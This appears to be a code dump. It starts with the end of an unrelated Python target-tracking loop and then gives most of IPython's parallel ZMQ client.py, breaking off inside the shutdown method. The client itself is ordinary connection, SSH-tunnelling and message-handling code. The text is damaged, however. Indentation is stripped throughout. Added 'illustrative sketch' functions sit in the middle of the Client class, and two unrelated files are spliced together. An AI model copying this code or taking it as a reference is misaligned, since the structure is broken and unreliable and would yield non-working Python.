track_ids_to_remove.append(track_id)
self.processor.addTargetToQueue(target)
for track_id in track_ids_to_remove: self.data_queues['nims'].pop(track_id)
for recent_target in self.recent_targets:
if (datetime.datetime.utcnow() - recent_target.lastseen).seconds >= config.drop_target_time:
print('Start removal process for Target:', recent_target.indices)
# Remove recent target from list
self.recent_targets.remove(recent_target)
# Processes any stage data remaining
#rt_nims_id = recent_target.get_entry_value('nims','id')
#if self.data_queues['nims'].get(rt_nims_id):
# new_target = self.createOrUpdateTarget(adcp=self.data_queues['adcp'],
# pamguard=self.data_queues['pamguard'],
# nims=self.data_queues['nims'].get(rt_nims_id))
#else:
# new_target = self.createOrUpdateTarget(adcp=self.data_queues['adcp'],
# pamguard=self.data_queues['pamguard'])
#if self.data_queues['nims'].get(rt_nims_id):
# self.processor.addTargetToQueue(new_target)
# Update classifier features list
self.target_space.update_classifier_tables(recent_target)
# Clear nims and pamguard
self.target_space.update(recent_target)
time.sleep(0.01)
|
client.py
|
"""A semi-synchronous Client for the ZMQ cluster
Authors:
* MinRK
"""
#-----------------------------------------------------------------------------
# Copyright (C) 2010-2011 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
import os
import json
import sys
from threading import Thread, Event
import time
import warnings
from datetime import datetime
from getpass import getpass
from pprint import pprint
pjoin = os.path.join
import zmq
# from zmq.eventloop import ioloop, zmqstream
from IPython.config.configurable import MultipleInstanceError
from IPython.core.application import BaseIPythonApplication
from IPython.core.profiledir import ProfileDir, ProfileDirError
from IPython.utils.coloransi import TermColors
from IPython.utils.jsonutil import rekey
from IPython.utils.localinterfaces import LOCALHOST, LOCAL_IPS
from IPython.utils.path import get_ipython_dir
from IPython.utils.py3compat import cast_bytes
from IPython.utils.traitlets import (HasTraits, Integer, Instance, Unicode,
Dict, List, Bool, Set, Any)
from IPython.external.decorator import decorator
from IPython.external.ssh import tunnel
from IPython.parallel import Reference
from IPython.parallel import error
from IPython.parallel import util
from IPython.kernel.zmq.session import Session, Message
from IPython.kernel.zmq import serialize
from .asyncresult import AsyncResult, AsyncHubResult
from .view import DirectView, LoadBalancedView
if sys.version_info[0] >= 3:
# xrange is used in a couple 'isinstance' tests in py2
# should be just 'range' in 3k
xrange = range
#--------------------------------------------------------------------------
# Decorators for Client methods
#--------------------------------------------------------------------------
@decorator
def spin_first(f, self, *args, **kwargs):
"""Call spin() to sync state prior to calling the method."""
self.spin()
return f(self, *args, **kwargs)
#--------------------------------------------------------------------------
# Classes
#--------------------------------------------------------------------------
class ExecuteReply(object):
"""wrapper for finished Execute results"""
def __init__(self, msg_id, content, metadata):
self.msg_id = msg_id
self._content = content
self.execution_count = content['execution_count']
self.metadata = metadata
def __getitem__(self, key):
return self.metadata[key]
def __getattr__(self, key):
if key not in self.metadata:
raise AttributeError(key)
return self.metadata[key]
def __repr__(self):
pyout = self.metadata['pyout'] or {'data':{}}
text_out = pyout['data'].get('text/plain', '')
if len(text_out) > 32:
text_out = text_out[:29] + '...'
return "<ExecuteReply[%i]: %s>" % (self.execution_count, text_out)
def _repr_pretty_(self, p, cycle):
pyout = self.metadata['pyout'] or {'data':{}}
text_out = pyout['data'].get('text/plain', '')
if not text_out:
return
try:
ip = get_ipython()
except NameError:
colors = "NoColor"
else:
colors = ip.colors
if colors == "NoColor":
out = normal = ""
else:
out = TermColors.Red
normal = TermColors.Normal
if '\n' in text_out and not text_out.startswith('\n'):
# add newline for multiline reprs
text_out = '\n' + text_out
p.text(
out + u'Out[%i:%i]: ' % (
self.metadata['engine_id'], self.execution_count
) + normal + text_out
)
def _repr_html_(self):
pyout = self.metadata['pyout'] or {'data':{}}
return pyout['data'].get("text/html")
def _repr_latex_(self):
pyout = self.metadata['pyout'] or {'data':{}}
return pyout['data'].get("text/latex")
def _repr_json_(self):
pyout = self.metadata['pyout'] or {'data':{}}
return pyout['data'].get("application/json")
def _repr_javascript_(self):
pyout = self.metadata['pyout'] or {'data':{}}
return pyout['data'].get("application/javascript")
def _repr_png_(self):
pyout = self.metadata['pyout'] or {'data':{}}
return pyout['data'].get("image/png")
def _repr_jpeg_(self):
pyout = self.metadata['pyout'] or {'data':{}}
return pyout['data'].get("image/jpeg")
def _repr_svg_(self):
pyout = self.metadata['pyout'] or {'data':{}}
return pyout['data'].get("image/svg+xml")
class Metadata(dict):
"""Subclass of dict for initializing metadata values.
Attribute access works on keys.
These objects have a strict set of keys - errors will raise if you try
to add new keys.
"""
def __init__(self, *args, **kwargs):
dict.__init__(self)
md = {'msg_id' : None,
'submitted' : None,
'started' : None,
'completed' : None,
'received' : None,
'engine_uuid' : None,
'engine_id' : None,
'follow' : None,
'after' : None,
'status' : None,
'pyin' : None,
'pyout' : None,
'pyerr' : None,
'stdout' : '',
'stderr' : '',
'outputs' : [],
'data': {},
'outputs_ready' : False,
}
self.update(md)
self.update(dict(*args, **kwargs))
def __getattr__(self, key):
"""getattr aliased to getitem"""
if key in self.iterkeys():
return self[key]
else:
raise AttributeError(key)
def __setattr__(self, key, value):
"""setattr aliased to setitem, with strict"""
if key in self.iterkeys():
self[key] = value
else:
raise AttributeError(key)
def __setitem__(self, key, value):
"""strict static key enforcement"""
if key in self.iterkeys():
dict.__setitem__(self, key, value)
else:
raise KeyError(key)
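# Illustrative sketch (not part of the original source): Metadata behaves like a
# dict with a fixed key set; attribute access is aliased to item access, and
# unknown keys raise instead of being silently added.
def _example_metadata_usage():
    md = Metadata(status='ok')
    md.engine_id = 3              # setattr aliased to setitem
    assert md['engine_id'] == 3
    try:
        md['not_a_real_key'] = 1  # strict key enforcement
    except KeyError:
        pass
    return md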
class Client(HasTraits):
"""A semi-synchronous client to the IPython ZMQ cluster
Parameters
----------
url_file : str/unicode; path to ipcontroller-client.json
This JSON file should contain all the information needed to connect to a cluster,
and is likely the only argument needed.
Connection information for the Hub's registration. If a json connector
file is given, then likely no further configuration is necessary.
[Default: use profile]
profile : bytes
The name of the Cluster profile to be used to find connector information.
If run from an IPython application, the default profile will be the same
as the running application, otherwise it will be 'default'.
cluster_id : str
String id to added to runtime files, to prevent name collisions when using
multiple clusters with a single profile simultaneously.
When set, will look for files named like: 'ipcontroller-<cluster_id>-client.json'
Since this is text inserted into filenames, typical recommendations apply:
Simple character strings are ideal, and spaces are not recommended (but
should generally work)
context : zmq.Context
Pass an existing zmq.Context instance, otherwise the client will create its own.
debug : bool
flag for lots of message printing for debug purposes
timeout : int/float
time (in seconds) to wait for connection replies from the Hub
[Default: 10]
#-------------- session related args ----------------
config : Config object
If specified, this will be relayed to the Session for configuration
username : str
set username for the session object
#-------------- ssh related args ----------------
# These are args for configuring the ssh tunnel to be used
# credentials are used to forward connections over ssh to the Controller
# Note that the ip given in `addr` needs to be relative to sshserver
# The most basic case is to leave addr as pointing to localhost (127.0.0.1),
# and set sshserver as the same machine the Controller is on. However,
# the only requirement is that sshserver is able to see the Controller
# (i.e. is within the same trusted network).
sshserver : str
A string of the form passed to ssh, i.e. 'server.tld' or 'user@server.tld:port'
If keyfile or password is specified, and this is not, it will default to
the ip given in addr.
sshkey : str; path to ssh private key file
This specifies a key to be used in ssh login, default None.
Regular default ssh keys will be used without specifying this argument.
password : str
Your ssh password to sshserver. Note that if this is left None,
you will be prompted for it if passwordless key based login is unavailable.
paramiko : bool
flag for whether to use paramiko instead of shell ssh for tunneling.
[default: True on win32, False else]
Attributes
----------
ids : list of int engine IDs
requesting the ids attribute always synchronizes
the registration state. To request ids without synchronization,
use semi-private _ids attributes.
history : list of msg_ids
a list of msg_ids, keeping track of all the execution
messages you have submitted in order.
outstanding : set of msg_ids
a set of msg_ids that have been submitted, but whose
results have not yet been received.
results : dict
a dict of all our results, keyed by msg_id
block : bool
determines default behavior when block not specified
in execution methods
Methods
-------
spin
flushes incoming results and registration state changes
control methods spin, and requesting `ids` also ensures up to date
wait
wait on one or more msg_ids
execution methods
apply
legacy: execute, run
data movement
push, pull, scatter, gather
query methods
queue_status, get_result, purge, result_status
control methods
abort, shutdown
"""
block = Bool(False)
outstanding = Set()
results = Instance('collections.defaultdict', (dict,))
metadata = Instance('collections.defaultdict', (Metadata,))
history = List()
debug = Bool(False)
_spin_thread = Any()
_stop_spinning = Any()
profile=Unicode()
def _profile_default(self):
if BaseIPythonApplication.initialized():
# an IPython app *might* be running, try to get its profile
try:
return BaseIPythonApplication.instance().profile
except (AttributeError, MultipleInstanceError):
# could be a *different* subclass of config.Application,
# which would raise one of these two errors.
return u'default'
else:
return u'default'
_outstanding_dict = Instance('collections.defaultdict', (set,))
_ids = List()
_connected=Bool(False)
_ssh=Bool(False)
_context = Instance('zmq.Context')
_config = Dict()
_engines=Instance(util.ReverseDict, (), {})
# _hub_socket=Instance('zmq.Socket')
_query_socket=Instance('zmq.Socket')
_control_socket=Instance('zmq.Socket')
_iopub_socket=Instance('zmq.Socket')
_notification_socket=Instance('zmq.Socket')
_mux_socket=Instance('zmq.Socket')
_task_socket=Instance('zmq.Socket')
_task_scheme=Unicode()
_closed = False
_ignored_control_replies=Integer(0)
_ignored_hub_replies=Integer(0)
def __new__(self, *args, **kw):
# don't raise on positional args
return HasTraits.__new__(self, **kw)
def __init__(self, url_file=None, profile=None, profile_dir=None, ipython_dir=None,
context=None, debug=False,
sshserver=None, sshkey=None, password=None, paramiko=None,
timeout=10, cluster_id=None, **extra_args
):
if profile:
super(Client, self).__init__(debug=debug, profile=profile)
else:
super(Client, self).__init__(debug=debug)
if context is None:
context = zmq.Context.instance()
self._context = context
self._stop_spinning = Event()
if 'url_or_file' in extra_args:
url_file = extra_args['url_or_file']
warnings.warn("url_or_file arg no longer supported, use url_file", DeprecationWarning)
if url_file and util.is_url(url_file):
raise ValueError("single urls cannot be specified, url-files must be used.")
self._setup_profile_dir(self.profile, profile_dir, ipython_dir)
if self._cd is not None:
if url_file is None:
if not cluster_id:
client_json = 'ipcontroller-client.json'
else:
client_json = 'ipcontroller-%s-client.json' % cluster_id
url_file = pjoin(self._cd.security_dir, client_json)
if url_file is None:
raise ValueError(
"I can't find enough information to connect to a hub!"
" Please specify at least one of url_file or profile."
)
with open(url_file) as f:
cfg = json.load(f)
self._task_scheme = cfg['task_scheme']
# sync defaults from args, json:
if sshserver:
cfg['ssh'] = sshserver
location = cfg.setdefault('location', None)
proto,addr = cfg['interface'].split('://')
addr = util.disambiguate_ip_address(addr, location)
cfg['interface'] = "%s://%s" % (proto, addr)
# turn interface,port into full urls:
for key in ('control', 'task', 'mux', 'iopub', 'notification', 'registration'):
cfg[key] = cfg['interface'] + ':%i' % cfg[key]
url = cfg['registration']
if location is not None and addr == LOCALHOST:
# location specified, and connection is expected to be local
if location not in LOCAL_IPS and not sshserver:
# load ssh from JSON *only* if the controller is not on
# this machine
sshserver=cfg['ssh']
if location not in LOCAL_IPS and not sshserver:
# warn if no ssh specified, but SSH is probably needed
# This is only a warning, because the most likely cause
# is a local Controller on a laptop whose IP is dynamic
warnings.warn("""
Controller appears to be listening on localhost, but not on this machine.
If this is true, you should specify Client(...,sshserver='you@%s')
or instruct your controller to listen on an external IP."""%location,
RuntimeWarning)
elif not sshserver:
# otherwise sync with cfg
sshserver = cfg['ssh']
self._config = cfg
self._ssh = bool(sshserver or sshkey or password)
if self._ssh and sshserver is None:
# default to ssh via localhost
sshserver = addr
if self._ssh and password is None:
if tunnel.try_passwordless_ssh(sshserver, sshkey, paramiko):
password=False
else:
password = getpass("SSH Password for %s: "%sshserver)
ssh_kwargs = dict(keyfile=sshkey, password=password, paramiko=paramiko)
# configure and construct the session
try:
extra_args['packer'] = cfg['pack']
extra_args['unpacker'] = cfg['unpack']
extra_args['key'] = cast_bytes(cfg['key'])
extra_args['signature_scheme'] = cfg['signature_scheme']
except KeyError as exc:
msg = '\n'.join([
"Connection file is invalid (missing '{}'), possibly from an old version of IPython.",
"If you are reusing connection files, remove them and start ipcontroller again."
])
raise ValueError(msg.format(exc.message))
self.session = Session(**extra_args)
self._query_socket = self._context.socket(zmq.DEALER)
if self._ssh:
tunnel.tunnel_connection(self._query_socket, cfg['registration'], sshserver, **ssh_kwargs)
else:
self._query_socket.connect(cfg['registration'])
self.session.debug = self.debug
self._notification_handlers = {'registration_notification' : self._register_engine,
'unregistration_notification' : self._unregister_engine,
'shutdown_notification' : lambda msg: self.close(),
}
self._queue_handlers = {'execute_reply' : self._handle_execute_reply,
'apply_reply' : self._handle_apply_reply}
try:
self._connect(sshserver, ssh_kwargs, timeout)
except:
self.close(linger=0)
raise
# last step: setup magics, if we are in IPython:
try:
ip = get_ipython()
except NameError:
return
else:
if 'px' not in ip.magics_manager.magics:
# in IPython but we are the first Client.
# activate a default view for parallel magics.
self.activate()
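# Illustrative usage sketch (not part of the original source). Typical ways to
# construct a Client, assuming an ipcontroller is already running; the profile
# name and file path below are placeholders.
def _example_connect_clients():
    rc = Client()                                    # default profile's client JSON
    rc_named = Client(profile='mycluster')           # a specific cluster profile
    rc_file = Client(url_file='/path/to/ipcontroller-client.json')
    return rc, rc_named, rc_file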
def __del__(self):
"""cleanup sockets, but _not_ context."""
self.close()
def _setup_profile_dir(self, profile, profile_dir, ipython_dir):
if ipython_dir is None:
ipython_dir = get_ipython_dir()
if profile_dir is not None:
try:
self._cd = ProfileDir.find_profile_dir(profile_dir)
return
except ProfileDirError:
pass
elif profile is not None:
try:
self._cd = ProfileDir.find_profile_dir_by_name(
ipython_dir, profile)
return
except ProfileDirError:
pass
self._cd = None
def _update_engines(self, engines):
"""Update our engines dict and _ids from a dict of the form: {id:uuid}."""
for k,v in engines.iteritems():
eid = int(k)
if eid not in self._engines:
self._ids.append(eid)
self._engines[eid] = v
self._ids = sorted(self._ids)
if sorted(self._engines.keys()) != range(len(self._engines)) and \
self._task_scheme == 'pure' and self._task_socket:
self._stop_scheduling_tasks()
def _stop_scheduling_tasks(self):
"""Stop scheduling tasks because an engine has been unregistered
from a pure ZMQ scheduler.
"""
self._task_socket.close()
self._task_socket = None
msg = "An engine has been unregistered, and we are using pure " +\
"ZMQ task scheduling. Task farming will be disabled."
if self.outstanding:
msg += " If you were running tasks when this happened, " +\
"some `outstanding` msg_ids may never resolve."
warnings.warn(msg, RuntimeWarning)
def _build_targets(self, targets):
"""Turn valid target IDs or 'all' into two lists:
(int_ids, uuids).
"""
if not self._ids:
# flush notification socket if no engines yet, just in case
if not self.ids:
raise error.NoEnginesRegistered("Can't build targets without any engines")
if targets is None:
targets = self._ids
elif isinstance(targets, basestring):
if targets.lower() == 'all':
targets = self._ids
else:
raise TypeError("%r not valid str target, must be 'all'"%(targets))
elif isinstance(targets, int):
if targets < 0:
targets = self.ids[targets]
if targets not in self._ids:
raise IndexError("No such engine: %i"%targets)
targets = [targets]
if isinstance(targets, slice):
indices = range(len(self._ids))[targets]
ids = self.ids
targets = [ ids[i] for i in indices ]
if not isinstance(targets, (tuple, list, xrange)):
raise TypeError("targets by int/slice/collection of ints only, not %s"%(type(targets)))
return [cast_bytes(self._engines[t]) for t in targets], list(targets)
def _connect(self, sshserver, ssh_kwargs, timeout):
"""setup all our socket connections to the cluster. This is called from
__init__."""
# Maybe allow reconnecting?
if self._connected:
return
self._connected=True
def connect_socket(s, url):
if self._ssh:
return tunnel.tunnel_connection(s, url, sshserver, **ssh_kwargs)
else:
return s.connect(url)
self.session.send(self._query_socket, 'connection_request')
# use Poller because zmq.select has wrong units in pyzmq 2.1.7
poller = zmq.Poller()
poller.register(self._query_socket, zmq.POLLIN)
# poll expects milliseconds, timeout is seconds
evts = poller.poll(timeout*1000)
if not evts:
raise error.TimeoutError("Hub connection request timed out")
idents,msg = self.session.recv(self._query_socket,mode=0)
if self.debug:
pprint(msg)
content = msg['content']
# self._config['registration'] = dict(content)
cfg = self._config
if content['status'] == 'ok':
self._mux_socket = self._context.socket(zmq.DEALER)
connect_socket(self._mux_socket, cfg['mux'])
self._task_socket = self._context.socket(zmq.DEALER)
connect_socket(self._task_socket, cfg['task'])
self._notification_socket = self._context.socket(zmq.SUB)
self._notification_socket.setsockopt(zmq.SUBSCRIBE, b'')
connect_socket(self._notification_socket, cfg['notification'])
self._control_socket = self._context.socket(zmq.DEALER)
connect_socket(self._control_socket, cfg['control'])
self._iopub_socket = self._context.socket(zmq.SUB)
self._iopub_socket.setsockopt(zmq.SUBSCRIBE, b'')
connect_socket(self._iopub_socket, cfg['iopub'])
self._update_engines(dict(content['engines']))
else:
self._connected = False
raise Exception("Failed to connect!")
#--------------------------------------------------------------------------
# handlers and callbacks for incoming messages
#--------------------------------------------------------------------------
def _unwrap_exception(self, content):
"""unwrap exception, and remap engine_id to int."""
e = error.unwrap_exception(content)
# print e.traceback
if e.engine_info:
e_uuid = e.engine_info['engine_uuid']
eid = self._engines[e_uuid]
e.engine_info['engine_id'] = eid
return e
def _extract_metadata(self, msg):
header = msg['header']
parent = msg['parent_header']
msg_meta = msg['metadata']
content = msg['content']
md = {'msg_id' : parent['msg_id'],
'received' : datetime.now(),
'engine_uuid' : msg_meta.get('engine', None),
'follow' : msg_meta.get('follow', []),
'after' : msg_meta.get('after', []),
'status' : content['status'],
}
if md['engine_uuid'] is not None:
md['engine_id'] = self._engines.get(md['engine_uuid'], None)
if 'date' in parent:
md['submitted'] = parent['date']
if 'started' in msg_meta:
md['started'] = msg_meta['started']
if 'date' in header:
md['completed'] = header['date']
return md
def _register_engine(self, msg):
"""Register a new engine, and update our connection info."""
content = msg['content']
eid = content['id']
d = {eid : content['uuid']}
self._update_engines(d)
def _unregister_engine(self, msg):
"""Unregister an engine that has died."""
content = msg['content']
eid = int(content['id'])
if eid in self._ids:
self._ids.remove(eid)
uuid = self._engines.pop(eid)
self._handle_stranded_msgs(eid, uuid)
if self._task_socket and self._task_scheme == 'pure':
self._stop_scheduling_tasks()
def _handle_stranded_msgs(self, eid, uuid):
"""Handle messages known to be on an engine when the engine unregisters.
It is possible that this will fire prematurely - that is, an engine will
go down after completing a result, and the client will be notified
of the unregistration and later receive the successful result.
"""
outstanding = self._outstanding_dict[uuid]
for msg_id in list(outstanding):
if msg_id in self.results:
# we already have this result
continue
try:
raise error.EngineError("Engine %r died while running task %r"%(eid, msg_id))
except:
content = error.wrap_exception()
# build a fake message:
msg = self.session.msg('apply_reply', content=content)
msg['parent_header']['msg_id'] = msg_id
msg['metadata']['engine'] = uuid
self._handle_apply_reply(msg)
def _handle_execute_reply(self, msg):
"""Save the reply to an execute_request into our results.
execute messages are never actually used. apply is used instead.
"""
parent = msg['parent_header']
msg_id = parent['msg_id']
if msg_id not in self.outstanding:
if msg_id in self.history:
print ("got stale result: %s"%msg_id)
else:
print ("got unknown result: %s"%msg_id)
else:
self.outstanding.remove(msg_id)
content = msg['content']
header = msg['header']
# construct metadata:
md = self.metadata[msg_id]
md.update(self._extract_metadata(msg))
# is this redundant?
self.metadata[msg_id] = md
e_outstanding = self._outstanding_dict[md['engine_uuid']]
if msg_id in e_outstanding:
e_outstanding.remove(msg_id)
# construct result:
if content['status'] == 'ok':
self.results[msg_id] = ExecuteReply(msg_id, content, md)
elif content['status'] == 'aborted':
self.results[msg_id] = error.TaskAborted(msg_id)
elif content['status'] == 'resubmitted':
# TODO: handle resubmission
pass
else:
self.results[msg_id] = self._unwrap_exception(content)
def _handle_apply_reply(self, msg):
"""Save the reply to an apply_request into our results."""
parent = msg['parent_header']
msg_id = parent['msg_id']
if msg_id not in self.outstanding:
if msg_id in self.history:
print ("got stale result: %s"%msg_id)
print(self.results[msg_id])
print(msg)
else:
print ("got unknown result: %s"%msg_id)
else:
self.outstanding.remove(msg_id)
content = msg['content']
header = msg['header']
# construct metadata:
md = self.metadata[msg_id]
md.update(self._extract_metadata(msg))
# is this redundant?
self.metadata[msg_id] = md
e_outstanding = self._outstanding_dict[md['engine_uuid']]
if msg_id in e_outstanding:
e_outstanding.remove(msg_id)
# construct result:
if content['status'] == 'ok':
self.results[msg_id] = serialize.unserialize_object(msg['buffers'])[0]
elif content['status'] == 'aborted':
self.results[msg_id] = error.TaskAborted(msg_id)
elif content['status'] == 'resubmitted':
# TODO: handle resubmission
pass
else:
self.results[msg_id] = self._unwrap_exception(content)
def _flush_notifications(self):
"""Flush notifications of engine registrations waiting
in ZMQ queue."""
idents,msg = self.session.recv(self._notification_socket, mode=zmq.NOBLOCK)
while msg is not None:
if self.debug:
pprint(msg)
msg_type = msg['header']['msg_type']
handler = self._notification_handlers.get(msg_type, None)
if handler is None:
raise Exception("Unhandled message type: %s" % msg_type)
else:
handler(msg)
idents,msg = self.session.recv(self._notification_socket, mode=zmq.NOBLOCK)
def _flush_results(self, sock):
"""Flush task or queue results waiting in ZMQ queue."""
idents,msg = self.session.recv(sock, mode=zmq.NOBLOCK)
while msg is not None:
if self.debug:
pprint(msg)
msg_type = msg['header']['msg_type']
handler = self._queue_handlers.get(msg_type, None)
if handler is None:
raise Exception("Unhandled message type: %s" % msg_type)
else:
handler(msg)
idents,msg = self.session.recv(sock, mode=zmq.NOBLOCK)
def _flush_control(self, sock):
"""Flush replies from the control channel waiting
in the ZMQ queue.
Currently: ignore them."""
if self._ignored_control_replies <= 0:
return
idents,msg = self.session.recv(sock, mode=zmq.NOBLOCK)
while msg is not None:
self._ignored_control_replies -= 1
if self.debug:
pprint(msg)
idents,msg = self.session.recv(sock, mode=zmq.NOBLOCK)
def _flush_ignored_control(self):
"""flush ignored control replies"""
while self._ignored_control_replies > 0:
self.session.recv(self._control_socket)
self._ignored_control_replies -= 1
def _flush_ignored_hub_replies(self):
ident,msg = self.session.recv(self._query_socket, mode=zmq.NOBLOCK)
while msg is not None:
ident,msg = self.session.recv(self._query_socket, mode=zmq.NOBLOCK)
def _flush_iopub(self, sock):
"""Flush replies from the iopub channel waiting
in the ZMQ queue.
"""
idents,msg = self.session.recv(sock, mode=zmq.NOBLOCK)
while msg is not None:
if self.debug:
pprint(msg)
parent = msg['parent_header']
# ignore IOPub messages with no parent.
# Caused by print statements or warnings from before the first execution.
if not parent:
idents,msg = self.session.recv(sock, mode=zmq.NOBLOCK)
continue
msg_id = parent['msg_id']
content = msg['content']
header = msg['header']
msg_type = msg['header']['msg_type']
# init metadata:
md = self.metadata[msg_id]
if msg_type == 'stream':
name = content['name']
s = md[name] or ''
md[name] = s + content['data']
elif msg_type == 'pyerr':
md.update({'pyerr' : self._unwrap_exception(content)})
elif msg_type == 'pyin':
md.update({'pyin' : content['code']})
elif msg_type == 'display_data':
md['outputs'].append(content)
elif msg_type == 'pyout':
md['pyout'] = content
elif msg_type == 'data_message':
data, remainder = serialize.unserialize_object(msg['buffers'])
md['data'].update(data)
elif msg_type == 'status':
# idle message comes after all outputs
if content['execution_state'] == 'idle':
md['outputs_ready'] = True
else:
# unhandled msg_type (status, etc.)
pass
# redundant?
self.metadata[msg_id] = md
idents,msg = self.session.recv(sock, mode=zmq.NOBLOCK)
#--------------------------------------------------------------------------
# len, getitem
#--------------------------------------------------------------------------
def __len__(self):
"""len(client) returns # of engines."""
return len(self.ids)
def __getitem__(self, key):
"""index access returns DirectView multiplexer objects
Must be int, slice, or list/tuple/xrange of ints"""
if not isinstance(key, (int, slice, tuple, list, xrange)):
raise TypeError("key by int/slice/iterable of ints only, not %s"%(type(key)))
else:
return self.direct_view(key)
#--------------------------------------------------------------------------
# Begin public methods
#--------------------------------------------------------------------------
@property
def ids(self):
"""Always up-to-date ids property."""
self._flush_notifications()
# always copy:
return list(self._ids)
def activate(self, targets='all', suffix=''):
"""Create a DirectView and register it with IPython magics
Defines the magics `%px, %autopx, %pxresult, %%px`
Parameters
----------
targets: int, list of ints, or 'all'
The engines on which the view's magics will run
suffix: str [default: '']
The suffix, if any, for the magics. This allows you to have
multiple views associated with parallel magics at the same time.
e.g. ``rc.activate(targets=0, suffix='0')`` will give you
the magics ``%px0``, ``%pxresult0``, etc. for running magics just
on engine 0.
"""
view = self.direct_view(targets)
view.block = True
view.activate(suffix)
return view
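# Illustrative usage sketch (not part of the original source). `rc` is assumed to
# be a connected Client; after activation the %px/%autopx/%pxresult magics target
# the selected engines, suffixed as described in the docstring above.
def _example_activate_magics(rc):
    rc.activate()                       # %px runs on all engines
    rc.activate(targets=0, suffix='0')  # %px0 runs on engine 0 only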
def close(self, linger=None):
"""Close my zmq Sockets
If `linger`, set the zmq LINGER socket option,
which allows discarding of messages.
"""
if self._closed:
return
self.stop_spin_thread()
snames = [ trait for trait in self.trait_names() if trait.endswith("socket") ]
for name in snames:
socket = getattr(self, name)
if socket is not None and not socket.closed:
if linger is not None:
socket.close(linger=linger)
else:
socket.close()
self._closed = True
def _spin_every(self, interval=1):
"""target func for use in spin_thread"""
while True:
if self._stop_spinning.is_set():
return
time.sleep(interval)
self.spin()
def spin_thread(self, interval=1):
"""call Client.spin() in a background thread on some regular interval
This helps ensure that messages don't pile up too much in the zmq queue
while you are working on other things, or just leaving an idle terminal.
It also helps limit potential padding of the `received` timestamp
on AsyncResult objects, used for timings.
Parameters
----------
interval : float, optional
The interval on which to spin the client in the background thread
(simply passed to time.sleep).
Notes
-----
For precision timing, you may want to use this method to put a bound
on the jitter (in seconds) in `received` timestamps used
in AsyncResult.wall_time.
"""
if self._spin_thread is not None:
self.stop_spin_thread()
self._stop_spinning.clear()
self._spin_thread = Thread(target=self._spin_every, args=(interval,))
self._spin_thread.daemon = True
self._spin_thread.start()
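# Illustrative usage sketch (not part of the original source). `rc` is assumed to
# be a connected Client; spinning in a background thread keeps `received`
# timestamps tight without requiring explicit calls to rc.spin().
def _example_background_spin(rc):
    rc.spin_thread(interval=0.5)  # poll twice per second in a daemon thread
    # ... submit and wait on work as usual ...
    rc.stop_spin_thread()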
def stop_spin_thread(self):
"""stop background spin_thread, if any"""
if self._spin_thread is not None:
self._stop_spinning.set()
self._spin_thread.join()
self._spin_thread = None
def spin(self):
"""Flush any registration notifications and execution results
waiting in the ZMQ queue.
"""
if self._notification_socket:
self._flush_notifications()
if self._iopub_socket:
self._flush_iopub(self._iopub_socket)
if self._mux_socket:
self._flush_results(self._mux_socket)
if self._task_socket:
self._flush_results(self._task_socket)
if self._control_socket:
self._flush_control(self._control_socket)
if self._query_socket:
self._flush_ignored_hub_replies()
def wait(self, jobs=None, timeout=-1):
"""waits on one or more `jobs`, for up to `timeout` seconds.
Parameters
----------
jobs : int, str, or list of ints and/or strs, or one or more AsyncResult objects
ints are indices to self.history
strs are msg_ids
default: wait on all outstanding messages
timeout : float
a time in seconds, after which to give up.
default is -1, which means no timeout
Returns
-------
True : when all msg_ids are done
False : timeout reached, some msg_ids still outstanding
"""
tic = time.time()
if jobs is None:
theids = self.outstanding
else:
if isinstance(jobs, (int, basestring, AsyncResult)):
jobs = [jobs]
theids = set()
for job in jobs:
if isinstance(job, int):
# index access
job = self.history[job]
elif isinstance(job, AsyncResult):
map(theids.add, job.msg_ids)
continue
theids.add(job)
if not theids.intersection(self.outstanding):
return True
self.spin()
while theids.intersection(self.outstanding):
if timeout >= 0 and ( time.time()-tic ) > timeout:
break
time.sleep(1e-3)
self.spin()
return len(theids.intersection(self.outstanding)) == 0
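# Illustrative usage sketch (not part of the original source). `rc` is assumed to
# be a connected Client and `view` one of its views; wait() blocks until the
# submitted work finishes or the timeout expires.
def _example_wait_for_result(rc, view):
    ar = view.apply_async(pow, 2, 10)     # AsyncResult for pow(2, 10) on the engines
    finished = rc.wait([ar], timeout=10)  # True only if all msg_ids complete in time
    return ar.get() if finished else None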
#--------------------------------------------------------------------------
# Control methods
#--------------------------------------------------------------------------
@spin_first
def clear(self, targets=None, block=None):
"""Clear the namespace in target(s)."""
block = self.block if block is None else block
targets = self._build_targets(targets)[0]
for t in targets:
self.session.send(self._control_socket, 'clear_request', content={}, ident=t)
error = False
if block:
self._flush_ignored_control()
for i in range(len(targets)):
idents,msg = self.session.recv(self._control_socket,0)
if self.debug:
pprint(msg)
if msg['content']['status'] != 'ok':
error = self._unwrap_exception(msg['content'])
else:
self._ignored_control_replies += len(targets)
if error:
raise error
@spin_first
def abort(self, jobs=None, targets=None, block=None):
"""Abort specific jobs from the execution queues of target(s).
This is a mechanism to prevent jobs that have already been submitted
from executing.
Parameters
----------
jobs : msg_id, list of msg_ids, or AsyncResult
The jobs to be aborted
If unspecified/None: abort all outstanding jobs.
"""
block = self.block if block is None else block
jobs = jobs if jobs is not None else list(self.outstanding)
targets = self._build_targets(targets)[0]
msg_ids = []
if isinstance(jobs, (basestring,AsyncResult)):
jobs = [jobs]
bad_ids = filter(lambda obj: not isinstance(obj, (basestring, AsyncResult)), jobs)
if bad_ids:
raise TypeError("Invalid msg_id type %r, expected str or AsyncResult"%bad_ids[0])
for j in jobs:
if isinstance(j, AsyncResult):
msg_ids.extend(j.msg_ids)
else:
msg_ids.append(j)
content = dict(msg_ids=msg_ids)
for t in targets:
self.session.send(self._control_socket, 'abort_request',
content=content, ident=t)
error = False
if block:
self._flush_ignored_control()
for i in range(len(targets)):
idents,msg = self.session.recv(self._control_socket,0)
if self.debug:
pprint(msg)
if msg['content']['status'] != 'ok':
error = self._unwrap_exception(msg['content'])
else:
self._ignored_control_replies += len(targets)
if error:
raise error
@spin_first
def shutdown(self, targets='all', restart=False, hub=False, block=None):
"""Terminates one or more engine processes, optionally including the hub.
Parameters
----------
targets: list of ints or 'all' [default: all]
Which engines to shutdown.
hub: bool [default: False]
Whether to include the Hub. hub=True implies targets='all'.
block: bool [default: self.block]
Whether to wait for clean shutdown replies or not.
restart: bool [default: False]
NOT IMPLEMENTED
whether to restart engines after shutting them down.
"""
from IPython.parallel.error import NoEnginesRegistered
if restart:
raise NotImplementedError("Engine restart is not yet implemented")
block = self.block if block is None else block
if hub:
targets = 'all'
try:
targets = self._build_targets(targets)[0]
except NoEnginesRegistered:
